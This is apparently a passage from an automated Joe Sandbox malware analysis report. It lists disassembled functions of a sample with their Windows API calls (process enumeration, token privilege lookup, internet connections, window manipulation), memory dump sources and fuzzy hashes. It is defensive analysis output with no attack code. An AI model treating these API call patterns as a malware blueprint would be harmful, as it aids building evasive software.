                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 25cdabb4dd0c05543f29de5d03197dfc7bb864dc496e311c17bb4ad389739431
                                                        • Instruction ID: 6a1a7cc93ce902d33c5a1f79589968814179025d83b615c4bfdcf2815b158e57
                                                        • Opcode Fuzzy Hash: 25cdabb4dd0c05543f29de5d03197dfc7bb864dc496e311c17bb4ad389739431
                                                        • Instruction Fuzzy Hash: 3A31E13160064AAFDF618F65CC44BBB7BF9FF42310F154029E924979A1D732E950EB90
                                                        Function 00144EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00144F02
                                                          • Part of subcall function 00123641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0012365B
                                                          • Part of subcall function 00123641: GetCurrentThreadId.KERNEL32 ref: 00123662
                                                          • Part of subcall function 00123641: AttachThreadInput.USER32(00000000,?,00125005), ref: 00123669
                                                        • GetCaretPos.USER32(?), ref: 00144F13
                                                        • ClientToScreen.USER32(00000000,?), ref: 00144F4E
                                                        • GetForegroundWindow.USER32 ref: 00144F54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: 3a4ff945c2d9540bea944b73f0823d2b217dd2a0574368121e1203caa04951b7
                                                        • Instruction ID: 9e97c4fb6e379599c935ae4f96865b0db08215d6186b0f52ae8409e0f54b0b1f
                                                        • Opcode Fuzzy Hash: 3a4ff945c2d9540bea944b73f0823d2b217dd2a0574368121e1203caa04951b7
                                                        • Instruction Fuzzy Hash: A7310B72D00108AFDB10EFA9C885EEFB7FDEF99304F10406AE455E7252DA759E458BA0
                                                        Function 00123C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00123C7A
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00123C88
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00123CA8
                                                        • CloseHandle.KERNEL32(00000000), ref: 00123D52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: b404e458831f53c126e18a1feb9b48bb6ad5a44091ec91ebb6cbf78920c3ef9d
                                                        • Instruction ID: 6a55c052b4ad6f954b3734c74133ddbb50560c95d8375325b3b80871b778f539
                                                        • Opcode Fuzzy Hash: b404e458831f53c126e18a1feb9b48bb6ad5a44091ec91ebb6cbf78920c3ef9d
                                                        • Instruction Fuzzy Hash: 8131B4311083059FD304EF60D885FEFBBE8EF99354F50082DF595861A2EB719A4ACB52
                                                        Function 0014C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • GetCursorPos.USER32(?), ref: 0014C4D2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000FB9AB,?,?,?,?,?), ref: 0014C4E7
                                                        • GetCursorPos.USER32(?), ref: 0014C534
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000FB9AB,?,?,?), ref: 0014C56E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: 255ba508cf1deb9cb6a0bad2fd7054736b86ff309906aab35b76631e264df86b
                                                        • Instruction ID: d6b66a522e980714ceec0b34ea4b2e42f113d3be8d48b719a640d559a6c7978b
                                                        • Opcode Fuzzy Hash: 255ba508cf1deb9cb6a0bad2fd7054736b86ff309906aab35b76631e264df86b
                                                        • Instruction Fuzzy Hash: 1431A035601418AFCB65CF58C858EEE7BB6EB0A350F444069F9058B671C731AD91DFE4
                                                        Function 00118656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0011810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00118121
                                                          • Part of subcall function 0011810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0011812B
                                                          • Part of subcall function 0011810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0011813A
                                                          • Part of subcall function 0011810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00118141
                                                          • Part of subcall function 0011810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00118157
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001186A3
                                                        • _memcmp.LIBCMT ref: 001186C6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001186FC
                                                        • HeapFree.KERNEL32(00000000), ref: 00118703
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 9673fbca116eb737ed215de001287c98e081570fcfb44f8b699512cec4a51d67
                                                        • Instruction ID: fe8c261e2611a9ae8b45839fe6f33f066591ddd9929e63f041faf6f88beace88
                                                        • Opcode Fuzzy Hash: 9673fbca116eb737ed215de001287c98e081570fcfb44f8b699512cec4a51d67
                                                        • Instruction Fuzzy Hash: 0521AF72E00108EFDB18DFA4C959BEEB7F8EF45304F158069E444AB251EB31AE85CB91
                                                        Function 000E098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __setmode.LIBCMT ref: 000E09AE
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00127896,?,?,00000000), ref: 000C5A2C
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00127896,?,?,00000000,?,?), ref: 000C5A50
                                                        • _fprintf.LIBCMT ref: 000E09E5
                                                        • OutputDebugStringW.KERNEL32(?), ref: 00115DBB
                                                          • Part of subcall function 000E4AAA: _flsall.LIBCMT ref: 000E4AC3
                                                        • __setmode.LIBCMT ref: 000E0A1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                        • String ID:
                                                        • API String ID: 521402451-0
                                                        • Opcode ID: 317a95469dd6d93ec81fd11fb96950b34e1332a3dffd9ea38a6b0b49fbf896e7
                                                        • Instruction ID: 369f6f9d73b71099ed4211ced51c933b16c76357b4c43e2a776fc527d1f35b39
                                                        • Opcode Fuzzy Hash: 317a95469dd6d93ec81fd11fb96950b34e1332a3dffd9ea38a6b0b49fbf896e7
                                                        • Instruction Fuzzy Hash: 11116A36504688BFCB04B7B6AC46EFE77A9DF85320F140069F10477193EF70598683A2
                                                        Function 00131767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001317A3
                                                          • Part of subcall function 0013182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0013184C
                                                          • Part of subcall function 0013182D: InternetCloseHandle.WININET(00000000), ref: 001318E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 1463438336-0
                                                        • Opcode ID: 2d4ee5213c59f74a487af09f7329774b2f215b04fc9781c1630159bec9b33db7
                                                        • Instruction ID: 845e4ad175675acff437ca3c21ac2d5e5d5d94d377b5ac6e11814313e95bb05c
                                                        • Opcode Fuzzy Hash: 2d4ee5213c59f74a487af09f7329774b2f215b04fc9781c1630159bec9b33db7
                                                        • Instruction Fuzzy Hash: 9321D236200605BFEB169F60DC01FBBBBE9FF49711F14402EFA1596660DB71D812ABA4
                                                        Function 00123A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,0014FAC0), ref: 00123A64
                                                        • GetLastError.KERNEL32 ref: 00123A73
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00123A82
                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0014FAC0), ref: 00123ADF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                        • String ID:
                                                        • API String ID: 2267087916-0
                                                        • Opcode ID: e779e119f024fb0e121a25b2adde673aef318b25a28594cbb9e4b88e95a892a6
                                                        • Instruction ID: 0658827e9848c935e2802e1f793483645908c69019aaf91cdfe3fd7d1ac4582d
                                                        • Opcode Fuzzy Hash: e779e119f024fb0e121a25b2adde673aef318b25a28594cbb9e4b88e95a892a6
                                                        • Instruction Fuzzy Hash: BC2183785082119F8310DF28D8819AFB7E4EF5A364F104A2DF4A9C72E2D735DE56CB52
                                                        Function 00145D11 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00145D80
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00145D9A
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00145DA8
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00145DB6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: f0dd8ede16dc5d2165119e43a628f440d67a42f680891f6f8a1682095ce3a41e
                                                        • Instruction ID: 2b201b60c384e5ef8a239e250dbb2c36a3106784db891b81f5ffaa4988f2a65b
                                                        • Opcode Fuzzy Hash: f0dd8ede16dc5d2165119e43a628f440d67a42f680891f6f8a1682095ce3a41e
                                                        • Instruction Fuzzy Hash: 4C117C31605510AFDB04AF64DC59FAE77AAAF86320F14421CF826CB3F2CB60AD41CB94
                                                        Function 0011DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0011F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0011DCD3,?,?,?,0011EAC6,00000000,000000EF,00000119,?,?), ref: 0011F0CB
                                                          • Part of subcall function 0011F0BC: lstrcpyW.KERNEL32(00000000,?,?,0011DCD3,?,?,?,0011EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0011F0F1
                                                          • Part of subcall function 0011F0BC: lstrcmpiW.KERNEL32(00000000,?,0011DCD3,?,?,?,0011EAC6,00000000,000000EF,00000119,?,?), ref: 0011F122
                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0011EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0011DCEC
                                                        • lstrcpyW.KERNEL32(00000000,?,?,0011EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0011DD12
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,0011EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0011DD46
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: c6410518ef5c076590785b0801e6b860730f03dbf1c645de698039bbc6ed3de6
                                                        • Instruction ID: 08cd7d1cb550c2d1b161bb7cab92373da70a7913f81e4446b2e3381094baf6d1
                                                        • Opcode Fuzzy Hash: c6410518ef5c076590785b0801e6b860730f03dbf1c645de698039bbc6ed3de6
                                                        • Instruction Fuzzy Hash: 2E11BE3A200305EFCB299F74E8459BA77A9FF46350B40803AF806CB2A0EB719881C791
                                                        Function 000F50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 000F5101
                                                          • Part of subcall function 000E571C: __FF_MSGBANNER.LIBCMT ref: 000E5733
                                                          • Part of subcall function 000E571C: __NMSG_WRITE.LIBCMT ref: 000E573A
                                                          • Part of subcall function 000E571C: RtlAllocateHeap.NTDLL(01430000,00000000,00000001,00000000,?,?,?,000E0DD3,?), ref: 000E575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 699700f5091f80324a3e3b36f1341894423aa38532471f7bb26361206fac0d36
                                                        • Instruction ID: 376822ee77019a1a4d464e98032064b9583531eda7c14191d1bcf2cede684f88
                                                        • Opcode Fuzzy Hash: 699700f5091f80324a3e3b36f1341894423aa38532471f7bb26361206fac0d36
                                                        • Instruction Fuzzy Hash: B1110A71504A19AECB312F71AC057BE37D8BF05363F144529FB48B6A63DF309980A790
                                                        Function 00136369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00127896,?,?,00000000), ref: 000C5A2C
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00127896,?,?,00000000,?,?), ref: 000C5A50
                                                        • gethostbyname.WSOCK32(?), ref: 00136399
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 001363A4
                                                        • _memmove.LIBCMT ref: 001363D1
                                                        • inet_ntoa.WSOCK32(?), ref: 001363DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
                                                        • Opcode ID: 9110187c9b3644b02cc79fb50fbc521c3140b14e031741dd0f6d69b54155290a
                                                        • Instruction ID: 7840db21912c2e800233f084e4ac2aad0ec59fb8c40eadfcf47acbc157783d06
                                                        • Opcode Fuzzy Hash: 9110187c9b3644b02cc79fb50fbc521c3140b14e031741dd0f6d69b54155290a
                                                        • Instruction Fuzzy Hash: 75115E76500109AFCB04FBA4DD46DEEB7B8BF19311B144069F505A72A2DB30AE54CBA1
                                                        Function 00118B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00118B61
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00118B73
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00118B89
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00118BA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: b2a92c0c03a6de25f8f8c7db1c4d5f0bb47f5ca9e7a5f832b1f0dfadaed2d8cd
                                                        • Instruction ID: 868081ff349a73903bfa24cddb00935acc5d8f8516c9f699760e950bde505021
                                                        • Opcode Fuzzy Hash: b2a92c0c03a6de25f8f8c7db1c4d5f0bb47f5ca9e7a5f832b1f0dfadaed2d8cd
                                                        • Instruction Fuzzy Hash: 6D110679901218BFEB11DBA5C885EADBBB8EB48710F2040A5EA04B7290DB716E51DB94
                                                        Function 000C1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 000C12D8
                                                        • GetClientRect.USER32(?,?), ref: 000FB5FB
                                                        • GetCursorPos.USER32(?), ref: 000FB605
                                                        • ScreenToClient.USER32(?,?), ref: 000FB610
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 4127811313-0
                                                        • Opcode ID: a53adf43391e93da11e4b7c4d460d502becf2261afc07bb35d8da5ddc6757eed
                                                        • Instruction ID: b4fa49f1fce97e565b698ba2b07f9235a213391e4558f1b9266c0104ac4f7486
                                                        • Opcode Fuzzy Hash: a53adf43391e93da11e4b7c4d460d502becf2261afc07bb35d8da5ddc6757eed
                                                        • Instruction Fuzzy Hash: 23112B39500419ABDB10EF94D885EFEB7B8EB06301F400459F901E7652C730AAA28BA5
                                                        Function 00121142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0011FCED,?,00120D40,?,00008000), ref: 0012115F
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0011FCED,?,00120D40,?,00008000), ref: 00121184
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0011FCED,?,00120D40,?,00008000), ref: 0012118E
                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,0011FCED,?,00120D40,?,00008000), ref: 001211C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
